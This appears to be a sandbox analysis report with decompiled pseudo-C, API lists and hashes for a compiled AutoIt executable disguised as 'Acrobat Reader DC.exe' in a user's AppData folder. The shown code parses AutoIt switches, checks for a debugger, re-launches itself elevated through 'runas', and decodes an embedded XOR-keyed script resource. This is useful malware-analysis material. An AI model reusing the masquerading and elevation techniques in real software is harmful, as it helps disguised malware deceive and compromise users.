                                  																					__eflags = _t233;
                                  																					if(_t233 == 0) {
                                  																						continue;
                                  																					} else {
                                  																						goto L42;
                                  																					}
                                  																				} else {
                                  																					_t234 = _t273[2];
                                  																					__eflags = _t234 & 0x00000002;
                                  																					if((_t234 & 0x00000002) != 0) {
                                  																						E00402250( &_v20);
                                  																						E00402250( &_v36);
                                  																						E00402250( &_v52);
                                  																						return 0xfffffffc;
                                  																					} else {
                                  																						_t273[2] = _t234 | 0x00000001;
                                  																						E0040E0A0( &_v20,  &_v36);
                                  																						continue;
                                  																					}
                                  																				}
                                  																			} else {
                                  																				_t242 = E00445AE0(__eflags,  &_v36, 0x484ea8);
                                  																				_t380 = _t392 + 8;
                                  																				__eflags = _t242;
                                  																				if(_t242 == 0) {
                                  																					L42:
                                  																					E00402250( &_v20);
                                  																					E00402250( &_v36);
                                  																					_t198 = E00402250( &_v52) | 0xffffffff;
                                  																					__eflags = _t198;
                                  																					return _t198;
                                  																				} else {
                                  																					_t273[2] = _t273[2] | 0x00000040;
                                  																					continue;
                                  																				}
                                  																			}
                                  																		} else {
                                  																			_t273[2] = _t273[2] | 0x00000020;
                                  																			_push(_v36);
                                  																			_t243 = E00413190();
                                  																			_t380 = _t391 + 4;
                                  																			_t273[0x33] = _t243;
                                  																			continue;
                                  																		}
                                  																	} else {
                                  																		_t273[2] = _t273[2] | 0x00000400;
                                  																		_push(_v36);
                                  																		_t245 = E00413190();
                                  																		_t380 = _t390 + 4;
                                  																		_t273[0x38] = _t245;
                                  																		continue;
                                  																	}
                                  																} else {
                                  																	_t273[2] = _t273[2] | 0x00000200;
                                  																	_push(_v36);
                                  																	_t246 = E00413190();
                                  																	_t380 = _t389 + 4;
                                  																	_t273[0x37] = _t246;
                                  																	continue;
                                  																}
                                  															} else {
                                  																_t273[2] = _t273[2] | 0x00000100;
                                  																_push(_v36);
                                  																_t247 = E00413190();
                                  																_t380 = _t388 + 4;
                                  																_t273[0x36] = _t247;
                                  																continue;
                                  															}
                                  														} else {
                                  															_t273[2] = _t273[2] | 0x00000080;
                                  															_push(_v36);
                                  															_t249 = E00413190();
                                  															_t380 = _t387 + 4;
                                  															_t273[0x35] = _t249;
                                  															continue;
                                  														}
                                  													} else {
                                  														_t273[2] = _t273[2] | 0x00000010;
                                  														_t373 =  &(_t273[0x1e]);
                                  														E00401070(_t373);
                                  														_push( &_v36);
                                  														_t314 =  &_v60;
                                  														_push( &_v60);
                                  														goto L19;
                                  													}
                                  												} else {
                                  													_t273[2] = _t273[2] | 0x00000008;
                                  													E0040E0A0(_v80,  &_v36);
                                  													continue;
                                  												}
                                  											} else {
                                  												_t258 = _t273[2];
                                  												__eflags = _t258 & 0x00000001;
                                  												if((_t258 & 0x00000001) != 0) {
                                  													E00402250( &_v20);
                                  													E00402250( &_v36);
                                  													E00402250( &_v52);
                                  													return 0xfffffffd;
                                  												} else {
                                  													_t263 = _t258 | 0x00000002;
                                  													__eflags = _t263;
                                  													_t373 =  &(_t273[0xd]);
                                  													_t273[2] = _t263;
                                  													E00401070(_t373);
                                  													_t314 =  &_v36;
                                  													_push( &_v36);
                                  													_push( &_v68);
                                  													L19:
                                  													_push(_t373);
                                  													_t252 = E0046906D(_t314, __eflags);
                                  													__eflags =  *_t252;
                                  													if( *_t252 == 0) {
                                  														continue;
                                  													} else {
                                  														E00402250( &_v20);
                                  														E00402250( &_v36);
                                  														E00402250( &_v52);
                                  														return 0xfffffffe;
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L69;
                                  							}
                                  						}
                                  						goto L54;
                                  					}
                                  				} else {
                                  					E0044CDAF(_t287, _t343, _t343, GetForegroundWindow());
                                  					_v96 =  *((intOrPtr*)( *_t343));
                                  					_t214 =  &_v96;
                                  					L7:
                                  					_push(_t214);
                                  					_push(_a16);
                                  					L8:
                                  					E00436299();
                                  					E00402250( &_v28);
                                  					E00402250( &_v44);
                                  					E00402250( &_v60);
                                  					return 1;
                                  				}
                                  				L69:
                                  			}











































































                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                  • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                  • IsWindow.USER32(?), ref: 0046F29A
                                  • GetDesktopWindow.USER32 ref: 0046F356
                                  • EnumChildWindows.USER32 ref: 0046F35D
                                  • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                  • API String ID: 329138477-1919597938
                                  • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                  • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                  • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                  • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 91%
                                  			E00401F20(void* __ecx, void* __eflags, intOrPtr _a4, char _a7) {
                                  				void* _v12;
                                  				char _v16;
                                  				char _v32;
                                  				char _v40;
                                  				char _v48;
                                  				intOrPtr _v56;
                                  				intOrPtr _v60;
                                  				char _v64;
                                  				char _v80;
                                  				struct HINSTANCE__* _v84;
                                  				void* __edi;
                                  				void* __esi;
                                  				char _t68;
                                  				void* _t85;
                                  				void* _t88;
                                  				void* _t91;
                                  				void* _t100;
                                  				intOrPtr* _t107;
                                  				void* _t111;
                                  				intOrPtr _t115;
                                  				intOrPtr _t116;
                                  				void* _t117;
                                  				intOrPtr _t127;
                                  				void* _t148;
                                  				intOrPtr* _t167;
                                  				void* _t170;
                                  				void* _t171;
                                  				void* _t172;
                                  				void* _t173;
                                  				void* _t174;
                                  				void* _t175;
                                  
                                  				_t177 = __eflags;
                                  				_t159 =  &_v84;
                                  				E0040E6E0( &_v84);
                                  				_push(_a4);
                                  				_v16 = 0;
                                  				E00402560( &_v84, _t148, __eflags);
                                  				GetModuleFileNameW(0, "C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104);
                                  				_t68 = E00410100(0x4a7f6c,  &_v84, _t177); // executed
                                  				_a7 = _t68;
                                  				 *0x4a7f50 = 0x4a7f6c;
                                  				E00410960(_t159,  &_v48,  &_v80);
                                  				E00401B10(L"CMDLINERAW",  &_v32, _t177);
                                  				E00401980(0, 1,  &_v48,  &_v32);
                                  				E00402250( &_v32);
                                  				E00408F40(L"CMDLINERAW",  &_v48);
                                  				_t155 = L"CMDLINE";
                                  				_v40 = 1;
                                  				_v48 = 0;
                                  				E00401B10(L"CMDLINE",  &_v32, _t177);
                                  				E00401980(0, 0x100,  &_v48,  &_v32);
                                  				E00402250( &_v32);
                                  				E00401B10(L"CMDLINE",  &_v32, _t177);
                                  				E0040C2C0(0,  &_v32,  &_v12,  &_v16);
                                  				E00402250( &_v32);
                                  				_t127 = _v56;
                                  				E0040BC70( &_v32, _t177);
                                  				E00401A10( &_v84,  &_v32,  &_v32);
                                  				_t165 = _v32;
                                  				_t85 = E004114AB(L"CMDLINE", L"/ErrorStdOut", _v32);
                                  				_t171 = _t170 + 8;
                                  				if(_t85 == 0) {
                                  					 *0x4974e8 = 1;
                                  					_t127 = _t127 - 1;
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					_t165 = _v32;
                                  				}
                                  				_t88 = E004114AB(_t155, L"/AutoIt3OutputDebug", _t165);
                                  				_t172 = _t171 + 8;
                                  				if(_t88 == 0) {
                                  					 *0x4974e7 = 1;
                                  					_t127 = _t127 - 1;
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					_t165 = _v32;
                                  				}
                                  				_t91 = E004114AB(_t155, L"/AutoIt3ExecuteLine", _t165);
                                  				_t173 = _t172 + 8;
                                  				if(_t91 == 0) {
                                  					__eflags = _a7;
                                  					 *0x4a7f58 = 1;
                                  					 *0x4a7f54 = 0 | _a7 == 0x00000000;
                                  					GetModuleFileNameW(0, "C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104);
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					E0040E0A0(0x4a7f5c,  &_v32);
                                  					_t143 =  &_v32;
                                  					_t127 = _t127 - 2;
                                  					E00401A10( &_v84,  &_v32, 0x4a7f5c);
                                  					_t165 = _v32;
                                  				}
                                  				_t100 = E004114AB(_t155, L"/AutoIt3ExecuteScript", _t165);
                                  				_t174 = _t173 + 8;
                                  				if(_t100 == 0) {
                                  					if(_a7 != _t100) {
                                  						 *0x4a7f54 = 0;
                                  					} else {
                                  						 *0x4a7f54 = 3;
                                  					}
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					E00411567("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", _v32);
                                  					_t174 = _t174 + 8;
                                  					_t143 =  &_v32;
                                  					_t127 = _t127 - 2;
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  					_t165 = _v32;
                                  				}
                                  				if( *0x4a7f6c == 0) {
                                  					E00411567("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", _t165);
                                  					_t174 = _t174 + 8;
                                  					_t143 =  &_v32;
                                  					_t127 = _t127 - 1;
                                  					E00401A10( &_v84,  &_v32, _t165);
                                  				}
                                  				if(_t127 < 0) {
                                  					_t127 = 0;
                                  				}
                                  				_t156 = _v12;
                                  				_push(_t127 + 1);
                                  				E0040E830(_v12, _t143, 1);
                                  				_push(0);
                                  				_t107 = E0040CF00(_t143, _v12, 0, 1);
                                  				_t175 = _t174 + 0x14;
                                  				_t167 = _t107;
                                  				E00408F40(_v12, _t167);
                                  				 *((intOrPtr*)(_t167 + 8)) = 1;
                                  				 *_t167 = _t127;
                                  				if(_t127 > 0) {
                                  					_t115 = 0;
                                  					while(1) {
                                  						_t116 = _t115 + 1;
                                  						_push(_t116);
                                  						_a4 = _t116;
                                  						_t117 = E0040CF00(_t143, _v12, 0, 1);
                                  						_t175 = _t175 + 0xc;
                                  						_t156 =  &_v32;
                                  						E0040E6A0(_t143, _t156, _t117);
                                  						_t143 = _t156;
                                  						E00401A10( &_v84, _t156, _t117);
                                  						if(_a4 >= _t127) {
                                  							goto L12;
                                  						}
                                  						_t115 = _a4;
                                  					}
                                  				}
                                  				L12:
                                  				E00402250( &_v32);
                                  				_t111 = E004019D0(E00408F40(_t156,  &_v48),  &_v64);
                                  				_v84 = 0;
                                  				_v64 = 0x484eac;
                                  				E004019D0(_t111,  &_v64);
                                  				_push(_v60);
                                  				E004111DC();
                                  				return E00402250( &_v80);
                                  			}



































                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • __wcsicoll.LIBCMT ref: 00402007
                                  • __wcsicoll.LIBCMT ref: 0040201D
                                  • __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                  • __wcsicoll.LIBCMT ref: 00402049
                                  • _wcscpy.LIBCMT ref: 0040207C
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104), ref: 00428B5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe$CMDLINE$CMDLINERAW
                                  • API String ID: 3948761352-1298289597
                                  • Opcode ID: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                  • Opcode Fuzzy Hash: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 98%
                                  			E0040D590(short* __eax, char __ecx, void* __eflags, void* __fp0) {
                                  				char _v5;
                                  				char _v6;
                                  				short* _v24;
                                  				short _v556;
                                  				short _v1084;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t25;
                                  				intOrPtr _t28;
                                  				int _t31;
                                  				char _t32;
                                  				void* _t53;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				char _t60;
                                  				short* _t73;
                                  				void* _t80;
                                  
                                  				_t89 = __fp0;
                                  				_t80 = __eflags;
                                  				_t60 = __ecx;
                                  				_t73 = __eax;
                                  				GetCurrentDirectoryW(0x104,  &_v556);
                                  				E00401F20(_t60, _t80, _t73); // executed
                                  				if(IsDebuggerPresent() != 0) {
                                  					return MessageBoxA(0, "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.", 0x484c92, 0x10);
                                  				}
                                  				_t25 =  *0x4a7f54; // 0x4
                                  				if(_t25 == 0) {
                                  					 *0x4974f4 = 0xffffffff;
                                  					return SetCurrentDirectoryW( &_v556);
                                  					L12:
                                  				}
                                  				_v5 = 0;
                                  				if(_t25 == 1) {
                                  					_t56 =  *0x4a7f5c; // 0xa72f18
                                  					_v6 = 0;
                                  					E00403A50(_t56, _t60, 0x4a90e8, 1, 0xffffffff);
                                  					_t69 =  *0x4974e8;
                                  					_t57 = _v6;
                                  					 *0x4a90eb =  *0x4974e8;
                                  					L5:
                                  					_t28 =  *0x4a7f54; // 0x4
                                  					if(E00401460(_t60, _t69, ?str?, _t28) != 0) {
                                  						E0040EC50(0x4a90e8);
                                  						_t31 = SetCurrentDirectoryW( &_v556);
                                  						 *0x4974f4 = 1;
                                  						return _t31;
                                  					}
                                  					if(_t57 == 1) {
                                  						_t32 = E00432FEE();
                                  						__eflags = _t32;
                                  						if(_t32 != 0) {
                                  							goto L7;
                                  						}
                                  						GetModuleFileNameW(0,  &_v1084, 0x104);
                                  						__eflags = _v5;
                                  						if(__eflags == 0) {
                                  							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _t73,  &_v556, 1);
                                  						} else {
                                  							_t79 =  &_v24;
                                  							E00401B10("\"",  &_v24, __eflags);
                                  							E0040D200(_t79, _t60, 0x4a7f6c, _t89);
                                  							E0040D200(_t79, _t60, "\"", _t89);
                                  							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _v24,  &_v556, 1);
                                  							E00402250(_t79);
                                  						}
                                  						L11:
                                  						E0040EC50(0x4a90e8);
                                  						return SetCurrentDirectoryW( &_v556);
                                  						goto L12;
                                  					}
                                  					L7:
                                  					E00410390(); // executed
                                  					E00410570();
                                  					if( *0x4a7f58 == 0) {
                                  						E0040E0C0(0x4a8710, _t89);
                                  					}
                                  					E004091E0(0x4a8178, _t69, _t89, 1); // executed
                                  					if( *0x4a7f58 == 0) {
                                  						E00401000(0x4a8710);
                                  					}
                                  					goto L11;
                                  				}
                                  				_t53 = E0040F520(0x4a7f6c, 0x4a90e8, __fp0, 0x4a7f54); // executed
                                  				if(_t53 == 0) {
                                  					 *0x4974f4 = 1;
                                  					return SetCurrentDirectoryW( &_v556);
                                  					goto L12;
                                  				} else {
                                  					_t60 =  *0x4a90e8; // 0x1
                                  					_t57 =  *0x4a90e9; // 0x0
                                  					_t69 =  &_v1084;
                                  					 *0x4a7f58 = _t60;
                                  					GetFullPathNameW("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104,  &_v1084, 0x4a7f50);
                                  					goto L5;
                                  				}
                                  			}






















                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                  • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                  • MessageBoxA.USER32 ref: 0042E1C9
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                    • Part of subcall function 00410390: LoadImageW.USER32 ref: 0041040E
                                    • Part of subcall function 00410390: RegisterClassExW.USER32 ref: 0041045D
                                    • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105A5
                                    • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105CE
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                    • Part of subcall function 0040E0C0: _memset.LIBCMT ref: 0040E0E2
                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                  • String ID: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                  • API String ID: 2493088469-2808984075
                                  • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                  • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 87%
                                  			E00452719(void* __eflags, signed int _a4, intOrPtr _a8, char _a12) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				signed int _v20;
                                  				char _v548;
                                  				char _v1076;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t37;
                                  				void* _t52;
                                  				void* _t54;
                                  				signed int _t59;
                                  				void* _t63;
                                  				void* _t64;
                                  				intOrPtr* _t89;
                                  				void* _t90;
                                  				void* _t91;
                                  				void* _t93;
                                  				void* _t96;
                                  				void* _t97;
                                  
                                  				_t99 = __eflags;
                                  				_t89 = _a4;
                                  				_v8 = 0;
                                  				while(1) {
                                  					E00414D04( &_v16, 1, 4,  *_t89);
                                  					E0044AFEF( &_v16, _t99,  &_v16, 4, 0x18ee);
                                  					_v12 = 0;
                                  					_t37 = E00414D30( &_v16, "FILE");
                                  					_t93 = _t91 + 0x18;
                                  					_t100 = _t37;
                                  					if(_t37 != 0) {
                                  						break;
                                  					}
                                  					_v8 = _v8 + 1;
                                  					E00414D04( &_a4, 4, 1,  *_t89);
                                  					_t83 = _a4 ^ 0x0000adbc;
                                  					_t63 = (_a4 ^ 0x0000adbc) + (_a4 ^ 0x0000adbc);
                                  					E00414D04( &_v548, 1, _t63,  *_t89);
                                  					E0044AFEF( &_v548, _t100,  &_v548, _t63, _t83 + 0xb33f);
                                  					 *((short*)(_t90 + _t63 - 0x220)) = 0;
                                  					E00411567( &_v1076,  &_v548);
                                  					E00414D04( &_a4, 4, 1,  *_t89);
                                  					_t86 = _a4 ^ 0x0000f820;
                                  					_t64 = (_a4 ^ 0x0000f820) + (_a4 ^ 0x0000f820);
                                  					E00414D04( &_v548, 1, _t64,  *_t89);
                                  					E0044AFEF( &_v548, _t100,  &_v548, _t64, _t86 + 0xf479);
                                  					_t23 =  &_a12; // 0x452944
                                  					 *((short*)(_t90 + _t64 - 0x220)) = 0;
                                  					E00411567( *_t23,  &_v548);
                                  					_t88 = _a8;
                                  					_t79 =  &_v1076;
                                  					_t52 = E0041313C( &_v1076, _a8);
                                  					_t96 = _t93 + 0x58;
                                  					if(_t52 == 0) {
                                  						L6:
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						_t54 = E0041313C(_t88, "*");
                                  						_t97 = _t96 + 8;
                                  						if(_t54 != 0) {
                                  							L5:
                                  							_push(1);
                                  							_push(1);
                                  							_push( *_t89); // executed
                                  							E004150D1(_t64, _t79, _t88, _t89, _t99); // executed
                                  							_t30 =  &_v20; // 0x452944
                                  							E00414D04(_t30, 4, 1,  *_t89);
                                  							_t31 =  &_v20; // 0x452944
                                  							_t59 =  *_t31 ^ 0x000087bc;
                                  							_v20 = _t59;
                                  							_push(1);
                                  							_push(_t59 + 0x18);
                                  							_push( *_t89); // executed
                                  							E004150D1(_t64, _t30, _t88, _t89, _t99); // executed
                                  							_t91 = _t97 + 0x28;
                                  							continue;
                                  						} else {
                                  							_t99 = _v8 - _t54;
                                  							if(_v8 == _t54) {
                                  								goto L6;
                                  							} else {
                                  								goto L5;
                                  							}
                                  						}
                                  					}
                                  					L8:
                                  				}
                                  				return 6;
                                  				goto L8;
                                  			}


























                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock$_fseek_wcscpy
                                  • String ID: D)E$D)E$FILE
                                  • API String ID: 3888824918-361185794
                                  • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                  • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 87%
                                  			E0040E360(intOrPtr __eax, void* __ecx, void* __eflags) {
                                  				char _v524;
                                  				char _v1052;
                                  				short _v1580;
                                  				char _v1596;
                                  				short _v1598;
                                  				short _v1600;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t37;
                                  				intOrPtr _t44;
                                  				signed int _t45;
                                  				void* _t49;
                                  				intOrPtr _t53;
                                  				intOrPtr _t54;
                                  				signed int _t55;
                                  				signed int _t63;
                                  				short* _t65;
                                  				intOrPtr _t75;
                                  				intOrPtr _t76;
                                  				signed int _t80;
                                  				signed int _t89;
                                  				intOrPtr _t93;
                                  				intOrPtr _t94;
                                  				void* _t95;
                                  				void* _t96;
                                  				void* _t98;
                                  				signed int _t103;
                                  				void* _t107;
                                  				void* _t108;
                                  
                                  				_t109 = __eflags;
                                  				_push(_t98);
                                  				_push(_t95);
                                  				_push(0x400);
                                  				 *0x4a90e8 = 0;
                                  				 *0x4a90ec = __eax;
                                  				 *0x4a90f0 = 0;
                                  				 *0x4a90f4 = 0;
                                  				 *0x4a90f8 = 0;
                                  				 *0x4a90fc = 0;
                                  				 *0x4a9100 = 0x485a88;
                                  				 *0x4a9104 = 0;
                                  				 *0x4a9108 = 0;
                                  				 *0x4a910c = 0;
                                  				 *0x4a9110 = 0x485a88;
                                  				 *0x4a9114 = 0;
                                  				 *0x4a9118 = 0;
                                  				 *0x4a911c = 0;
                                  				 *0x4a9124 = 0;
                                  				 *0x4a912c = 0;
                                  				 *0x4a9130 = 0x66; // executed
                                  				_t37 = E004115D7(_t95, _t98, __eflags); // executed
                                  				 *0x4a9120 = _t37;
                                  				GetModuleFileNameW(0,  &_v1580, 0x104);
                                  				E00413A0E( &_v1580,  &_v524,  &_v1052, 0, 0);
                                  				E00413A5A( &_v1052, L"Include", 0x104);
                                  				E00413A9E( &_v1580,  &_v524,  &_v1052, 0, 0);
                                  				_push(0x20a);
